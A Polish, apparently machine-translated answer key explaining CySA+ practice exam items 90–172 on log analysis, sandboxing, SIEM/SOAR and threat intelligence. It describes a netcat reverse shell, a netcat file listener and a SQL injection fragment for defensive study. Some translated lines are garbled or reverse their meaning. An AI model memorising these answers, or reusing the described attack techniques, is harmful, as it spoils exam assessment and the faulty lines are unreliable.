90. C. Port TCP 22 wskazuje, że najprawdopodobniej jest to skanowanie SSH, a pojedynczy pakiet bez ruchu odpowiedzi oznacza nieudane próby połączenia. Jeśli system nie jest zwykle używany do skanowania w poszukiwaniu otwartych serwerów SSH, Alicja powinna sprawdzić, dlaczego zachowuje się w ten sposób.
91. C. Debugery pozwalają kontrolować wykonywanie programu poprzez ustawianie punktów przerwania, zmianę danych wejściowych i zmiennych oraz kontrolowanie wykonywania programu w inny sposób. Deasemblery i dekompilatory mogą zapewnić wgląd w kod pliku binarnego (zarówno kod źródłowy, jak i kod asemblera), podczas gdy narzędzie rozpakowujące pomaga usunąć kompresję lub szyfrowanie używane do zaciemniania samego kodu.
92. A. Gdy używasz grep z flagą -i, wykonuje wyszukiwanie bez rozróżniania wielkości liter. Ani -uc, ani -case nie są dla tego poprawną flagą, a wyszukiwany termin pojawia się przed nazwą pliku, co oznacza, że grep example.txt cysa+ spróbuje przeszukać plik o nazwie cysa+ pod kątem frazy przykład.txt.
93. C. Najczęstszym sposobem identyfikacji złośliwych linków osadzonych w wiadomościach e-mail jest użycie pakietu oprogramowania chroniącego przed złośliwym oprogramowaniem do skanowania wszystkich wiadomości e-mail. Zazwyczaj obejmują narzędzia łączące listy reputacji adresów IP i domen, a także inne narzędzia heurystyczne i analityczne, które pomagają identyfikować złośliwe i niechciane łącza.
94. A. Zautomatyzowane narzędzia do analizy złośliwego oprogramowania wykorzystują bezpieczne i oprzyrządowane środowisko piaskownicy do rozpakowywania i uruchamiania złośliwego oprogramowania, aby mogły obserwować i rejestrować działania podejmowane przez złośliwe oprogramowanie. Służy do przeprowadzania analizy behawioralnej, a także do generowania odcisków palców plików i innych elementów unikalnych sygnatur złośliwego oprogramowania.
95. B. Duże przepływy danych opuszczające sieć organizacji mogą być oznaką eksfiltracji danych przez zaawansowane trwałe zagrożenie. Używanie protokołu HTTPS do ochrony danych przy jednoczesnym zmniejszeniu ich podejrzanego wyglądu jest powszechną techniką.
96. B. Powtarzające się awarie z tego samego hosta prawdopodobnie wskazują na atak brute-force na konto root.
97. C. Na szczęście usługa sshd ma ustawienie konfiguracyjne o nazwie PermitRootLogin . Ustawienie go na "nie" zrealizuje cel Singha.
98. A. Polecenie at może służyć do planowania zadań systemu Windows. To zadanie uruchamia netcata jako odwrotną powłokę przy użyciu cmd.exe przez port 443 w każdy piątek o 20:30. czas lokalny. Azra powinna być zaniepokojona, ponieważ pozwala to na blokowanie ruchu, który w przeciwnym razie mógłby zostać zablokowany.
99. C. Ten wynik pokazuje atak brute-force przeprowadzony na konto root hosta lokalnego przy użyciu protokołu SSH. Spowodowało to, że użytkownik root zbyt wiele razy próbował ponownie uwierzytelnić się, a PAM zablokował ponowne próby. Fail2ban nie jest skonfigurowany dla tej usługi; zatem jest to jedyny element, który nie wystąpił. Gdyby było włączone, dziennik Fail2ban odczytałby coś w stylu 11-07-2019 12:00:00,111 fail2ban.actions: OSTRZEŻENIE [ssh] Ban 127.0.0.1 .
100. B. Rozwiązania NAC, które wdrażają kryteria oparte na funkcjach pracowniczych, często wykorzystują mechanizmy kontroli oparte na czasie, aby zapewnić, że pracownicy mają dostęp tylko wtedy, gdy mają pracować, kryteria oparte na rolach ze względu na ich obowiązki oraz zasady oparte na lokalizacji, aby zapewnić, że uzyskują dostęp tylko do sieci, w których pracują. Kryteria oparte na regułach zwykle skupiają się na kondycji i konfiguracji systemu, a zatem skupiają się bardziej na komputerze lub oprogramowaniu niż na użytkowniku.
101. C. Najlepszą opcją dla Naomi jest dedykowane narzędzie piaskownicy, takie jak Sandboxie, lub piaskownica usług w chmurze, taka jak app.run.any . Zostały zaprojektowane tak, aby izolować złośliwe oprogramowanie, zapewniając jednocześnie narzędzia do przechwytywania i analizowania wyników działania złośliwego oprogramowania. Ręczne tworzenie środowiska wirtualizacji jest możliwe, ale wymaga dużo pracy, aby oprzyrządować i zbudować narzędzia do analizy złośliwego oprogramowania. Narzędzie do konteneryzacji najlepiej nadaje się do wdrażania aplikacji, a analizator pakietów jest przydatny do przeglądania ruchu sieciowego.
102. B. Flaga - l jest tutaj kluczową wskazówką, wskazującą, że netcat został skonfigurowany jako słuchacz. Każde połączenie z portem 43501 spowoduje wysłanie pliku example.zip do łączącej się aplikacji. Zazwyczaj złośliwy użytkownik łączy się następnie z tym portem za pomocą netcata ze zdalnego systemu, aby pobrać plik.
103. C. Port TCP 3389 jest standardowym portem protokołu RDP (Remote Desktop Protocol) firmy Microsoft. To zapytanie zwróci wszystkie dopasowania nazw źródła i miejsca docelowego dla wszystkich zdarzeń sieciowych, w których port docelowy to 3389 - najprawdopodobniej system z dostępną usługą RDP.
104. D. Kontrole bezpieczeństwa są ważne we wszystkich punktach wymienionych w pytaniu. Po zaewidencjonowaniu kodu do repozytorium można go sprawdzić za pomocą narzędzi do statycznej analizy kodu. Kod zostanie następnie przetestowany w zautomatyzowanym środowisku testowym, w którym można go przetestować, sprawdzić, czy jest odpowiednio wzmocniony i przetestowany w sposób, którego środowisko produkcyjne może nie ryzykować. Wreszcie środowiska produkcyjne można monitorować i testować penetrację
105. A. Windows 10 Pro i Enterprise obsługuje białą listę aplikacji. Lukas może umieścić na białej liście swoje dozwolone programy, a następnie ustawić domyślny tryb na Niedozwolone, zapobiegając uruchamianiu wszystkich innych aplikacji, a tym samym umieszczając aplikację na czarnej liście. Może to być trochę kłopotliwe w utrzymaniu, ale może być przydatne w środowiskach o wysokim poziomie bezpieczeństwa lub takich, w których ograniczenie uruchamianych programów ma kluczowe znaczenie.
106. C. To pokazuje próbę ataku SQL injection. Zapytanie odczytuje 1 UNION SELECT 0 , a następnie szuka nazwy użytkownika, identyfikatora_użytkownika, hasła i adresu e-mail z tabeli użytkowników.
107. B. Analizator pakietów sieciowych i protokołów, taki jak Wireshark, może umożliwić Jasonowi podgląd aktywności sieciowej podejmowanej przez robaka, a tym samym analizę jego zachowania. Deasembler pozwoli mu rozebrać plik binarny aplikacji, aby zobaczyć kod, który się za nim kryje, podczas gdy debugger pozwoli mu manipulować uruchomionym programem. Wreszcie, przeglądarka PE może pomóc w takich rzeczach, jak wyświetlanie zależności dla plików binarnych systemu Windows.
108. D. Flagi -n -i -v oznaczają, że wyszukiwanie wyświetli listę numerów linii dla każdego wystąpienia, w którym słowo mike nie występuje. W rzeczywistości flaga -v odwraca zwykłe wyszukiwanie, aby umożliwić wyszukiwanie miejsc, w których termin się nie pojawia. Używając * dla nazwy pliku będzie pasować do wszystkich plików w bieżącym katalogu.
109. C. Pamiętaj, że prawa są odczytywane od lewej do prawej jako prawa użytkownika, prawa grupowe, a następnie prawa światowe. Tutaj czytaliśmy, pisaliśmy i wykonywaliśmy (rwx) dla chuck , rw dla admingroup i r dla world.
110. C. Atakujący często używają wbudowanych narzędzi edycyjnych, które są nieumyślnie lub celowo udostępniane do edycji plików w celu wstrzyknięcia złośliwego kodu. W tym przypadku ktoś próbował zmodyfikować plik 404 wyświetlany przez WordPress. Każdy, kto otrzymał błąd 404 podczas tej instalacji, mógł być narażony na złośliwy kod umieszczony na stronie 404 lub po prostu na zniszczoną stronę 404.
111. B. Narzędzie SOAR (Security Orchestration, Automation and Response) koncentruje się dokładnie na tym, co Melissa musi zrobić. Chociaż SIEM zapewnia podobną funkcjonalność, kluczowym wyróżnikiem jest szerokość platform, z których narzędzia SOAR mogą pozyskiwać dane, a także oferowane przez nie możliwości automatyzacji procesów. Narzędzia UEBA (analizy zachowania jednostki użytkownika) koncentrują się na zachowaniach, a nie na szerokim zbiorze danych organizacyjnych, a systemy MDR (zarządzane reakcje wykrywania) są wykorzystywane do przyspieszenia wykrywania, a nie do zapewnienia zgodności i orkiestracji.
112. C. Monica wydała polecenie, które tylko zatrzymuje działającą usługę. Uruchomi się ponownie po ponownym uruchomieniu, chyba że skrypty, które go uruchamiają, są wyłączone. W nowoczesnych systemach Ubuntu jest to obsługiwane przez upstart. Inne usługi mogą używać skryptów init.d. W obu przypadkach, po zadaniu takiego pytania, możesz szybko zidentyfikować to jako problem, który wystąpił podczas ponownego uruchamiania i usunąć odpowiedź, która prawdopodobnie nie będzie prawidłowa.
113. B. Systemy zapobiegania włamaniom są umieszczane w linii między sieciami lub systemami, aby mogły wchodzić w interakcje z ruchem, dając im możliwość blokowania wykrytych ataków. Może to być również niebezpieczne, ponieważ źle skonfigurowany IPS, IPS, w którym wystąpiła awaria sprzętu lub oprogramowania, lub IPS z fałszywym alarmem mogą uniemożliwić przepływ legalnego ruchu. Zarówno systemy IDS, jak i IPS mogą wykrywać te same ataki i oba mogą używać ataków heurystycznych i opartych na sygnaturach, jeśli są w stanie to zrobić.
114. B. Pakiety Encapsulating Security Payload (ESP) są częścią pakietu protokołów IPsec i są zazwyczaj powiązane z tunelem lub VPN. Ryan powinien sprawdzić aplikację VPN i określić, z jaką usługą lub systemem użytkownik mógł się połączyć.
115. A. Bohai widzi, że nie wystąpiły nieprawidłowe logowanie i że ktoś zalogował się jako użytkownik po godzinach pracy. Oznacza to, że konto prawdopodobnie zostało naruszone i powinien zbadać, w jaki sposób hasło zostało utracone. (W wielu przypadkach Bohai musi zapytać wiceprezesa ds. finansów o złe nawyki dotyczące haseł, takie jak zapisywanie ich lub używanie prostego hasła).
116. C. Chociaż niektóre czarne listy wykorzystują całe zakresy adresów IP, zmiana adresów IP serwerów SMTP jest często dobrym rozwiązaniem. Niektóre organizacje odkrywają nawet, że jeden serwer został umieszczony na czarnej liście, a inne w ich klastrze nie. Migracja do dostawcy chmury lub współpraca z organizacjami na czarnych listach również może pomóc, a narzędzia do weryfikacji online mogą pomóc Wang szybko sprawdzić, na których listach znajduje się jej organizacja. Zmiana nagłówków SMTP nie pomoże.
117. A. Aplikacja komputerowa, która normalnie nie zapewnia zdalnego dostępu, otwierając port usługi, jest przykładem nietypowego zachowania. Jeśli serwer WWW otworzyłby TCP/80 lub TCP/443, byłoby to oczekiwane zachowanie i prawdopodobnie będzie to dobre zachowanie. Zarówno jednostka, jak i zachowanie heurystyczne zostały wymyślone na to pytanie.
118. B. Duże przepływy danych opuszczające sieć organizacji mogą być oznaką eksfiltracji danych przez zaawansowane trwałe zagrożenie (APT). Używanie protokołu HTTPS do ochrony danych przy jednoczesnym zmniejszeniu ich podejrzanego wyglądu jest powszechną techniką.
119. B. Wzbogacanie danych łączy dane z wielu źródeł, takich jak katalogi, informacje geolokalizacyjne i inne źródła danych, a także źródła zagrożeń, aby zapewnić głębszy i szerszy wgląd w bezpieczeństwo. Nie jest to tylko forma łączenia źródeł informacji o zagrożeniach, a kombinacja kanałów informacji o zagrożeniach jest techniką węższą niż wzbogacanie danych.
120. D. DNS blackholing wykorzystuje listę znanych złośliwych domen lub adresów IP i polega na wyświetlaniu domen na wewnętrznym serwerze DNS, który zapewnia fałszywą odpowiedź. Zatrucie tras uniemożliwia sieciom wysyłanie danych do nieprawidłowego miejsca docelowego. Routery zazwyczaj nie mają funkcji filtrowania chroniącego przed złośliwym oprogramowaniem, dlatego w odpowiedzi na to pytanie stworzono białą listę subdomen.
121. C. Gdy punkty końcowe są połączone bez sieciowego punktu kontrolnego między nimi, wymagane jest rozwiązanie oparte na hoście. W tym przypadku szczególnym wymaganiem firmy Lucca jest zapobieganie atakom, a nie tylko ich wykrywanie, co oznacza, że do jego potrzeb wymagany jest system zapobiegania włamaniom do hosta (HIPS). Wiele nowoczesnych produktów łączy możliwości systemu HIPS z innymi funkcjami, takimi jak zapobieganie utracie danych (DLP) i profilowanie zgodności systemu, więc Lucca może otrzymać dodatkowe przydatne funkcje, jeśli wybierze produkt z tymi funkcjami.
122. C. Najlepszą praktyką dla większości urządzeń sieciowych jest umieszczenie ich interfejsów administracyjnych w chronionej sieci. Wiele organizacji wymaga od administratorów połączenia za pośrednictwem skrzynki przeskokowej, dodając kolejną warstwę ochrony. Zapobieganie dostępowi do konsoli jest zazwyczaj niepożądane w przypadku konieczności wprowadzenia zmian i braku GUI. Blokada logowania może pomóc, ale tylko spowolni ataki i nie zapobiegnie im.
123. C. Próbkowanie losowe lub deterministyczne może pomóc zespołowi Sama w uchwyceniu użytecznych przepływów, mimo że nie jest w stanie obsłużyć pełnej przepustowości sieci. Próbkowanie losowe przechwyci losowy pakiet z każdych n pakietów, z n ustawionymi przez użytkownika. Próbkowanie deterministyczne pobiera po prostu każdy n-ty pakiet, który przechodzi. Więc Sam może próbkować 1, 11, 21 i tak dalej. Oznacza to, że małe przepływy mogą zostać pominięte, ale w tym przypadku próbkowanie połowy wszystkich pakietów jest nadal możliwe, co oznacza, że większość przepływów nadal będzie przechwytywana.
124. B. Alicja może użyć analizy trendów, aby określić, jakie ataki najprawdopodobniej wycelują w jej organizację, a następnie podjąć działania w oparciu o zidentyfikowane trendy.
125. B. Systemy zarządzania informacjami o zabezpieczeniach i zdarzeniami (SIEM) zazwyczaj zapewniają ostrzeganie, korelację zdarzeń i dzienników, gromadzenie i raportowanie danych dotyczących zgodności, agregację danych i dzienników oraz możliwości przechowywania danych. Oznacza to również, że mogą być wykorzystywane do analizy kryminalistycznej, ponieważ powinny być zaprojektowane tak, aby zapewnić bezpieczną kopię danych. Zazwyczaj nie zapewniają one funkcji związanych z zarządzaniem wydajnością.
126. B. Tripwire i podobne programy są przeznaczone do monitorowania plików pod kątem zmian i raportowania o zachodzących zmianach. Opierają się na odciskach palców plików (hashe) i są zaprojektowane tak, aby były niezawodne i skalowalne. Najlepszym rozwiązaniem dla Kathleen jest użycie narzędzia zaprojektowanego do pracy, a nie próba napisania własnego.
127. B. Heurystyczne metody wykrywania uruchamiają potencjalną aplikację złośliwego oprogramowania i śledzą, co się dzieje. Dzięki temu narzędzie do ochrony przed złośliwym oprogramowaniem może określić, czy zachowania i działania programu są zgodne z typowymi dla złośliwego oprogramowania, nawet jeśli plik nie jest zgodny z odciskiem palca znanych pakietów złośliwego oprogramowania.
128. A. W tym przypadku, jeśli użytkownik jest zalogowany do systemów administracyjnych, najbardziej użytecznym dodatkowym szczegółem, jaki Alaina mogłaby mieć, byłoby użycie konta uprzywilejowanego. Informacje logowania oparte na czasie mogą również okazać się przydatne, ale podróżujący użytkownik administracyjny może po prostu przebywać w innej strefie czasowej. Zmiany profilu urządzenia mobilnego i anomalie żądań DNS są mniej skorelowane ze zdalnym exploitem, a bardziej prawdopodobne, że są skorelowane odpowiednio z naruszeniem urządzenia użytkownika lub złośliwym oprogramowaniem. Rank Software zapewnia świetny poradnik dotyczący polowania na zagrożenia pod adresem cdn2.hubspot.net/hubfs/2539398/Rank%20 Software_Threat%20Hunting%20Playbook.pdf, który może okazać się przydatny, jeśli weźmiesz pod uwagę te zagrożenia.
129. B. Dzienniki zapory zazwyczaj zawierają podobne informacje, które są zawarte w rekordach NetFlow. Jednak zapora nie zawsze ma taki sam dostęp do ruchu sieciowego, jak przełączniki i routery generujące informacje NetFlow. Dzienniki zapory, choć nie są kompletnym substytutem, zapewniają dobrą kontrolę nad brakiem rekordów NetFlow. Routery i przełączniki zazwyczaj nie rejestrują rekordów ruchu w swoich standardowych dziennikach - jest to funkcja NetFlow, która jest niedostępna w tej sieci. Systemy zapobiegania włamaniom (IPS) nie rejestrują rutynowych informacji o ruchu drogowym.
130. A. macOS ma wbudowane narzędzie do monitorowania pamięci w ramach Monitora aktywności. Pokaże Ci szczegóły, w tym ile pamięci ma system, co jest używane przez aplikacje i system operacyjny, ile miejsca zajmują pliki z pamięci podręcznej w celu poprawy wydajności systemu, ile miejsca na dysku zajmuje miejsce wymiany, i jak efektywnie twoja pamięć jest wykorzystywana w formie statystyki zwanej presji pamięci.
131. D. Pakiety bezpieczeństwa punktów końcowych zazwyczaj obejmują zapory sieciowe hosta, systemy zapobiegania włamaniom do hosta (IPS) oraz oprogramowanie chroniące przed złośliwym oprogramowaniem. Technologia wirtualnej sieci prywatnej (VPN) jest zwykle podstawowym składnikiem systemu operacyjnego lub wykorzystuje oprogramowanie dostarczone przez dostawcę VPN.
132. B. Skanowanie podatności nie służyłoby jako kontrola kompensująca, ponieważ wykrywałoby, a nie poprawiało luki w zabezpieczeniach. Nic nie wskazuje na to, że na tym serwerze nie ma szyfrowania lub że rozwiązałoby to lukę związaną z iniekcją SQL. Zarówno system zapobiegania włamaniom (IPS), jak i zapora aplikacji internetowej (WAF) mogą służyć jako kontrola kompensacyjna i blokować złośliwe żądania. Z tych dwóch najlepszym rozwiązaniem w tym przypadku byłby WAF, ponieważ został stworzony specjalnie do ochrony przed wykorzystywaniem luk w aplikacjach internetowych.
133. C. Pierwszy wpis w dzienniku wskazuje, że użytkownik uwierzytelnił się z systemu 10.174.238.88.
134. C. Drugi wpis w dzienniku wskazuje, że demon sshd obsługiwał połączenie. Ten demon obsługuje protokół Secure Shell (SSH).
135. B. Pierwszy wpis w dzienniku wskazuje, że użytkownik wykorzystał szyfrowanie kluczem publicznym (PKI) do uwierzytelnienia połączenia. W związku z tym użytkownik posiadał klucz prywatny, który odpowiadał kluczowi publicznemu przechowywanemu na serwerze i powiązanemu z użytkownikiem.
136. B. Tożsamość użytkownika nawiązującego połączenie pojawia się w pierwszym wpisie dziennika: accept publickey for ec2-user . Trzeci wpis dziennika t r hat zawierający łańcuch USER=root rejestruje fakt, że użytkownik wydał polecenie sudo, aby utworzyć interaktywną powłokę bash z uprawnieniami administratora. To nie jest konto używane do tworzenia połączenia z serwerem. Wpis pam_unix wskazuje, że sesja została uwierzytelniona przy użyciu wtykowego modułu uwierzytelniania (PAM).
137. B. Przepływy sieciowe można wykorzystać do identyfikacji wzorców ruchu między systemami, które są nietypowe lub łączą się z systemami, które są znanymi złośliwymi lub złośliwymi witrynami. Korzystając ze swojego SIEM, Lucca może szukać najlepszych rozmówców, anomalii związanych z zachowaniem lub trendami lub innych korelacji, które wskazują na problem.
138. C. Ta próbka przepływu pokazuje dostęp do czterech różnych hostów z 192.168.2.1. Są to 10.2.3.1, 10.6.2.4, 10.6.2.5 i 10.8.2.5.
139. C. Kolejnym krokiem Fiony powinno być sformułowanie hipotezy. Kiedy zaczyna rozważać scenariusz, musi zidentyfikować cel i prawdopodobne techniki przeciwnika oraz określić, w jaki sposób zweryfikowałaby hipotezę.
140. B. W STIX są to wszystkie poziomy zasobów ataku, od pojedynczych osób do zasobów na poziomie rządowym. Gdy napotkasz takie pytanie, powinieneś wyeliminować odpowiedzi, które można łatwo usunąć, takie jak poziom certyfikacji i nazwa zagrożenia. Następnie zastanów się, jakie są cele profilowania cyberprzestępców. W takim przypadku poziom zasobów ataku ma sens jako część opisu zdolności.
141. B. Kampanie uświadamiające są jednymi z najskuteczniejszych sposobów przeciwdziałania spear phishingowi. Dobrze wyposażona organizacja APT będzie wysyłać wiadomości e-mail z legalnych adresów e-mail, omijając w ten sposób większość zabezpieczeń DKIM i SPF. Blokowanie e-maili od wszystkich nieznanych nadawców jest nie do przyjęcia dla większości organizacji.
142. D. Podejścia oparte na sztucznej inteligencji (AI) i uczeniu maszynowym (ML) są idealne w przypadku dużych ilości logów i danych analitycznych. Procesy ręczne, takie jak badania oparte na hipotezach lub badania oparte na IOC lub IOA, mogą zająć dużo czasu w przypadku dużych ilości danych.
143. D. Dani musi dokładnie rozważyć, co może się wydarzyć podczas analizy złośliwego oprogramowania. Po zezwoleniu na połączenie z jednym lub większą liczbą zdalnych systemów musi mieć świadomość, że może to spowodować zmiany zachowania, sondy lub ataki ze strony atakującego lub może zaatakować inne systemy, gdy ma połączenie sieciowe i może odbierać polecenia .
144. C. Możesz nie pamiętać wszystkich popularnych portów TCP, ale będziesz chciał się upewnić, że dobrze znasz kilka z nich, w tym takie rzeczy jak LPR (515), IPP (631) i RAW (9100). ) porty wspólne dla wielu drukarek. Ponieważ te porty muszą być otwarte dla usług drukowania, najlepszą opcją byłoby przeniesienie ich do chronionej podsieci lub zakresu adresów IP. Często do tego celu używane są nieroutowalne adresy IP RFC 1918, ale James może chcieć sprawdzić, dlaczego takie urządzenia są narażone na Internet. Może mieć głębszy problem!
145. B. Łączenie krytycznych aktywów w grupy pozwala na wspólną ocenę podobnych aktywów, wykorzystując podobieństwo ich profili zagrożeń. To sprawia, że analiza jest mniej złożona, a nie bardziej złożona. Aktywa powinny być pogrupowane według podobnych poziomów wrażliwości, a nie mieszane. Zagrożenia są oceniane pod kątem innych zagrożeń w celach porównawczych, a pakietowanie aktywów nie zapewni dla nich punktu odniesienia.
146. C. Istnieje wiele wskaźników naruszenia bezpieczeństwa, w tym te wymienione w tym pytaniu, a także anomalie w korzystaniu z kont uprzywilejowanych, nienormalne żądania bazy danych i wzorce ruchu, anomalie geograficzne i czasowe we wzorcach użytkowania, nieoczekiwane i nienormalne wzrost ruchu i wiele innych. SCAP jest protokołem automatyzacji i obie odpowiedzi na zagrożenia nie pasują do tej listy, chociaż wyszukiwanie zagrożeń i źródła zagrożeń mogą zawierać takie szczegóły, jak rodzaj ruchu lub informacje o ataku.
147. B. Usługi, pola wejściowe, protokoły, interfejsy API i inne potencjalne cele są przykładami wektorów ataku. Zagrożenia to możliwe zagrożenia, które mogą wykorzystywać lukę w zabezpieczeniach, a ryzyko to narażenie na straty lub szkody wynikające z naruszeń lub ataków. Napięcie powierzchniowe to termin z fizyki, a nie cyberbezpieczeństwa.
148. C. STIX i TAXII razem stanowią kluczowe elementy wielu zintegrowanych platform wywiadowczych, ponieważ oferują otwarty standard opisu i przesyłania danych wywiadowczych o zagrożeniach. Termin, którego cele egzaminacyjne CySA+ używają dla tej koncepcji, to zintegrowana inteligencja. Łączenie źródeł analizy zagrożeń w jedną platformę lub model jest ważną koncepcją, ponieważ różne źródła zagrożeń mogą mieć różne uprzedzenia, dostęp do informacji, których nie mają inni, lub inne zalety lub wady, które warto wykorzystać lub obejść. Dlatego korzystanie ze zintegrowanej inteligencji powinno być częścią procesu analizy zagrożeń.
149. B. Ponieważ Naomi jest szczególnie zaniepokojona zagrożeniem ze strony użytkownika końcowego w postaci zagrożeń wewnętrznych, narzędzie UEBA (analiza zachowania jednostki użytkownika) jest jej najlepszą opcją z listy. Odpowiedzi na system UEBA będą monitorować zachowania nietypowe dla użytkowników, takie jak te, które może przyjąć zagrożenie wewnętrzne. System wykrywania włamań wykrywałby nietypową aktywność sieciową i ataki, podczas gdy zarówno systemy SOAR, jak i SIEM byłyby przydatne do centralizacji danych z narzędzi takich jak UEBA i IDS.
150. D. Ling może użyć swojego systemu SOAR do analizy wszystkich powszechnych wskaźników wiadomości phishingowych, w tym treści wiersza tematu, adresów nadawców, załączników i nagłówków. Stamtąd jej system SOAR może przypisać do wiadomości e-mail wartość ważności i podjąć odpowiednie działania, takie jak testowanie załączników w odizolowanym środowisku lub usuwanie wiadomości phishingowych ze skrzynek pocztowych w jej organizacji.
151. C. Jedynym spójnym wskaźnikiem tego bota na liście jest adres IP. Isaac powinien napisać swój skrypt, aby zweryfikować adresy IP systemów, aby sprawdzić, czy należy je umieścić na czarnej liście.
152. B. Systemy SOAR oferują wiele sposobów pozyskiwania danych, a syslog, interfejsy API, poczta e-mail, kanały STIX/TAXII i połączenia z bazą danych są powszechnymi sposobami pozyskiwania danych.
153. B. Automatyczne tworzenie sygnatur złośliwego oprogramowania jest konieczne ze względu na ogromną liczbę nowych pakietów złośliwego oprogramowania, wariantów, a tym samym nowych sygnatur, które są tworzone codziennie. Przegląd BASS z 2017 roku, kiedy BASS został utworzony, zauważył, że codziennie pojawiało się 9500 nowych sygnatur, a ten problem tylko się pogorszył.
154. D. Zarys egzaminu CySA+ określa ten proces jako wzbogacanie danych. Wzbogacanie danych może przybierać różne formy, ale podstawowa koncepcja polega na tym, że dodawanie i korelowanie wielu źródeł danych zapewnia bogatsze i bardziej użyteczne środowisko danych. Jak można się domyślić, pozostałe opcje tego pytania zostały wymyślone.
155. C. Dane w użyciu to termin najczęściej używany do opisania danych, z których użytkownik aktualnie korzysta lub z którymi wchodzi w interakcję. Dane w spoczynku to dane przechowywane lub zarchiwizowane. Dane w ruchu to dane, które przechodzą przez sieć do punktu końcowego. Wykonanie danych zostało wymyślone na to pytanie.
156. B. Opis pytania zawiera szczegóły dotyczące użycia wpisu rejestru startowego dla Common Startup i wymienia klucz rejestru. Oznacza to, że złośliwe oprogramowanie Reaver, jak opisano, utrzymuje trwałość przy użyciu klucza rejestru.
157. C. Uczenie maszynowe w systemach takich jak ten opiera się na zestawach danych do tworzenia profili zachowań, które następnie wykorzystuje do identyfikacji nienormalnego zachowania. Wykorzystują również dane behawioralne, które są często związane z atakami i złośliwym oprogramowaniem, i wykorzystują je do porównywania z wzorcami zachowań użytkowników. Analiza oparta na sygnaturach wykorzystuje mieszanie lub inne powiązane techniki w celu sprawdzenia, czy pliki pasują do znanego pakietu złośliwego oprogramowania. Maszyna Babbage jest komputerem mechanicznym i na to pytanie została wymyślona analiza sztucznej sieci.
158. C. Chociaż systemy SIEM i SOAR często mają podobną funkcjonalność, systemy SOAR są zazwyczaj projektowane do pracy z szerszym zakresem systemów wewnętrznych i zewnętrznych, w tym z kanałami informacji o zagrożeniach i innymi źródłami danych, a następnie wspomagają automatyzację odpowiedzi.
159. C. National Vulnerability Database wykorzystuje protokół SCAP (Security Content Automation Protocol) do przedstawiania danych dotyczących zarządzania lukami w zabezpieczeniach. STIX to ustrukturyzowany język używany do opisywania informacji o cyberzagrożeniach. CVSS (Common Vulnerability Scoring System) i CPE (Common Platform Enumeration) są wykorzystywane do zasilania danych SCAP.
160. C. Ciągła integracja pomaga programistom często integrować ich kod z główną bazą kodu. Chociaż automatyczne testowanie nie zawsze jest częścią ciągłej integracji, jest użyteczną częścią kompletnego potoku ciągłej integracji (CI)/ciągłego dostarczania (CD). Ciągłe dostarczanie ma na celu umożliwienie wdrożenia potoku kodu w dowolnym momencie za pomocą automatycznego testowania i automatycznej konfiguracji. Niektóre organizacje automatycznie wprowadzają zmiany do produkcji. W odpowiedzi na to pytanie wymyślono zarówno repo-stuffing, jak i kodowanie czasu.
161. B. Pojedynczy analityk pracujący sam może mieć ograniczenia w swojej wiedzy, doświadczeniu i własnych empirycznych uprzedzeniach. Dlatego Fiona powinna przejrzeć swoje hipotezy pod kątem własnych naturalnych uprzedzeń i może chcieć zaangażować innych analityków lub ekspertów, aby pomogli je kontrolować.
162. D. Zgodnie z taksonomią STIX 2.0 (docs.oasis-open.org/cti/stix/v2.0/csprd02/part1-stix-core/stix-v2.0-csprd02-part1-stix-core .html #_Toc482357275 ), podmioty państwowe, takie jak te, które są odpowiedzialne za ataki na poziomie APT, są klasyfikowane jako strategiczne. Eksperci są wykwalifikowani i mogą tworzyć własne narzędzia, ale nie działają na masową skalę aktora APT.
163. C. STIX (Structured Threat Information Expression Language) został stworzony właśnie w tym celu. Jest przeznaczony do współużytkowania przez protokół TAXII (Trusted Automated Exchange of Intelligence Information), za pośrednictwem modelu dystrybucji typu hub-and-spoke, źródło/subskrybent lub peer-to-peer. OAuth jest używany do delegowania dostępu, a STONES został wymyślony na to pytanie.
164. C. Najlepszą opcją Alainy jest usuwanie wiadomości e-mail z tymi adresami URL ze wszystkich przychodzących wiadomości e-mail. Blokowanie lub monitorowanie adresów IP może pomóc, ale użytkownicy mobilni i spoza witryny nie będą chronieni, jeśli nie prześlą swojego ruchu przez zaporę sieciową lub IDS.
165. A. Dziura DNS dokładnie spełnia potrzeby Rowana. Może przekierowywać ruch przeznaczony dla złośliwych witryn i kontrolerów botnetów na stronę docelową, która ostrzega użytkownika końcowego, że coś poszło nie tak.
166. B. Algorytmy generowania domen (DGA) automatycznie generują domeny przy użyciu algorytmu opartego na porze dnia, kluczach kryptograficznych lub innych informacjach, których algorytm może użyć do identyfikacji nazw domen, z którymi powinien się połączyć. DGA wygenerują dużą liczbę nazw, a autorzy złośliwego oprogramowania muszą wtedy użyć tylko małego podzbioru, co utrudnia znalezienie hostów kontrolnych, podczas gdy obrońcy muszą zidentyfikować lub zablokować wszystkie wygenerowane hosty.
167. D. Port TCP 22 jest powszechnie używany do ruchu SSH. Jeśli nie znasz popularnych portów, powinieneś je przejrzeć przed przystąpieniem do egzaminu CySA+.
168. A. Statyczna analiza kodu wymaga dostępu do kodu źródłowego, co oznacza, że narzędzie SAST będzie musiało być kompatybilne ze wszystkimi językami, które Michelle musiała przetestować. W odpowiedzi na to pytanie wymyślono binarny język wyjściowy, podczas gdy opcje C i D odnoszą się do testowania dynamicznego, ponieważ aplikacja byłaby uruchamiana w obu opcjach.
169. B. Wykrycia oparte na sygnaturach muszą być zgodne ze zdefiniowaną sygnaturą używaną przez IPS. Niektóre IPS mogą wykorzystywać techniki wykrywania oparte na heurystyce (zachowaniu); jednak Nina nie użyła tego w swojej konfiguracji, więc nowe ataki z niebezpiecznymi zachowaniami nie zostaną wykryte.
170. B. Implementacja NetFlow lub sFlow może dostarczyć Nathanowi potrzebnych mu danych. Przepływy pokazują źródło, miejsce docelowe, rodzaj ruchu i ilość ruchu, a jeśli zbierze informacje o przepływie z prawidłowych lokalizacji w swojej sieci, będzie mógł zobaczyć, które systemy wysyłają najwięcej ruchu, a także będzie miał ogólny wyobrażenie o tym, jaki jest ruch. Sniffer wymaga więcej zasobów, podczas gdy SDWAN to zdefiniowana programowo sieć rozległa, która może zapewnić pewną widoczność, ale niekoniecznie spełnia jego potrzeby. Wreszcie, podsłuch sieciowy służy do przechwytywania danych, ale sam podsłuch nie analizuje ani nie dostarcza tych informacji.
171. B. Kusząca może być odpowiedź "brak wpływu", ale lepszą odpowiedzią jest tutaj "brak wpływu na usługi". System nadal będzie wymagał naprawy, co pochłonie czas pracowników, więc nie będzie całkowitego braku wpływu.
172. D. Usługa nie ma krytycznego znaczenia, ponieważ po przywróceniu można z niej korzystać w zwykły sposób, bez znaczącego wpływu na działalność firmy z powodu przestoju. Jednak podczas awarii jest to odmowa usługi niekrytycznej.
